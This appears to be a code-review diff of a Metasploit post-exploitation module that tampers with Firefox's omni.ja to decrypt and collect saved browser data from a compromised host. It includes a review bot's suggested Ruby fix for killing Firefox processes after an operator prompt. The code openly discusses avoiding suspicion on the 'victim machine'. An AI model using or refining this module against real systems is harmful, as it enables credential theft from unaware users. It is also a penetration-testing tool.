|
16 | 16 |
|
17 | 17 | class Metasploit3 < Msf::Post |
18 | 18 |
|
| 19 | + include Rex::Ui::Interactive |
19 | 20 | include Msf::Post::File |
20 | 21 | include Msf::Post::Common |
21 | 22 | include Msf::Auxiliary::Report |
@@ -75,11 +76,6 @@ def run |
75 | 76 | end |
76 | 77 |
|
77 | 78 | if datastore['DECRYPT'] |
78 | | - print_line() |
79 | | - print_warning("Please be aware of that if your session dies while file renaming,") |
80 | | - print_warning("this could leave Firefox in a non working state. This option needs") |
81 | | - print_warning("some extra time to accomplish the task.\n") |
82 | | - |
83 | 79 | omnija = nil |
84 | 80 | org_file = 'omni.ja' |
85 | 81 | new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".ja" |
@@ -116,6 +112,7 @@ def run |
116 | 112 | return |
117 | 113 | end |
118 | 114 | print_status("Uploading #{new_file} to #{@paths['ff']}") |
| 115 | + print_warning("This takes some extra time") if @platform =~ /unix|osx/ |
119 | 116 | if not upload_file(@paths['ff']+new_file, tmp) |
120 | 117 | print_error("Could not upload #{new_file}") |
121 | 118 | return |
@@ -477,22 +474,34 @@ def trigger_decrypt(org_file, new_file) |
477 | 474 | if session.type == "meterpreter" |
478 | 475 | session.sys.process.each_process do |p| |
479 | 476 | if p['name'] =~ /firefox\.exe/ |
480 | | - print_status("Found running Firefox process, attempting to kill.") |
481 | | - if not session.sys.process.kill(p['pid']) |
482 | | - print_error("Could not kill Firefox process") |
483 | | - return false |
| 477 | + print_status("Found running Firefox process") |
| 478 | + continue = warn_user() |
| 479 | + if continue |
| 480 | + if not session.sys.process.kill(p['pid']) |
| 481 | + print_error("Could not kill Firefox process") |
| 482 | + return false |
| 483 | + end |
| 484 | + else |
| 485 | + file_rm(new_file) |
| 486 | + return false |
484 | 487 | end |
485 | 488 | end |
486 | 489 | end |
487 | 490 |
|
488 | 491 | elsif session.type != "meterpreter" |
489 | 492 | p = cmd_exec("ps", "cax | grep firefox") |
490 | 493 | if p =~ /firefox/ |
491 | | - print_status("Found running Firefox process, attempting to kill.") |
492 | | - term = cmd_exec("killall", "firefox && echo true") |
493 | | - if not term =~ /true/ |
494 | | - print_error("Could not kill Firefox process") |
495 | | - return false |
| 494 | + print_status("Found running Firefox process") |
| 495 | + continue = warn_user() |
| 496 | + if continue |
| 497 | + term = cmd_exec("killall", "firefox && echo true") |
| 498 | + if not term =~ /true/ |
| 499 | + print_error("Could not kill Firefox process") |
| 500 | + return false |
| 501 | + end |
| 502 | + else |
| 503 | + file_rm(new_file) |
| 504 | + return false |
496 | 505 | end |
497 | 506 | end |
498 | 507 | end |
@@ -526,6 +535,13 @@ def trigger_decrypt(org_file, new_file) |
526 | 535 |
|
527 | 536 | end |
528 | 537 |
|
| 538 | + def warn_user() |
| 539 | + print_warning("In order to proceed, the running Firefox process must be killed.") |
| 540 | + print_warning("Keep in mind that this leaves visual evidence on the victim machine and") |
| 541 | + print_warning("if the user is paying attention, this could make him/her suspicious.") |
| 542 | + return prompt_yesno("Do you want to continue?") |
| 543 | + end |
| 544 | + |
529 | 545 | def download_loot(paths) |
530 | 546 | loot = "" |
531 | 547 | paths.each do |path| |
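Review bot: In the meterpreter branch of trigger_decrypt (new lines 477-487), `warn_user()` is called inside the `each_process` block, so the operator is prompted once per matching `firefox.exe` entry, and answering no on a later prompt returns false after an earlier process has already been killed. Collect the matching PIDs first, ask once, then kill, as sketched below. Separately, the abort path calls `file_rm(new_file)` while `run` uploads to `@paths['ff']+new_file`; if `new_file` arrives as the bare name (the call site is not visible here), the uploaded copy stays on the target host, and the removal should use the same joined path. `continue` is also a misleading local name in Ruby, and something like `proceed` reads better. trigger_decrypt starts and ends outside the shown hunks.

```ruby
if session.type == "meterpreter"
  # Gather matching PIDs first so the confirmation is asked exactly once.
  pids = []
  session.sys.process.each_process do |p|
    pids << p['pid'] if p['name'] =~ /firefox\.exe/
  end
  unless pids.empty?
    print_status("Found running Firefox process")
    unless warn_user()
      file_rm(new_file)
      return false
    end
    pids.each do |pid|
      if not session.sys.process.kill(pid)
        print_error("Could not kill Firefox process")
        return false
      end
    end
  end
# … unchanged: non-meterpreter branch (ps / killall) …
```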
|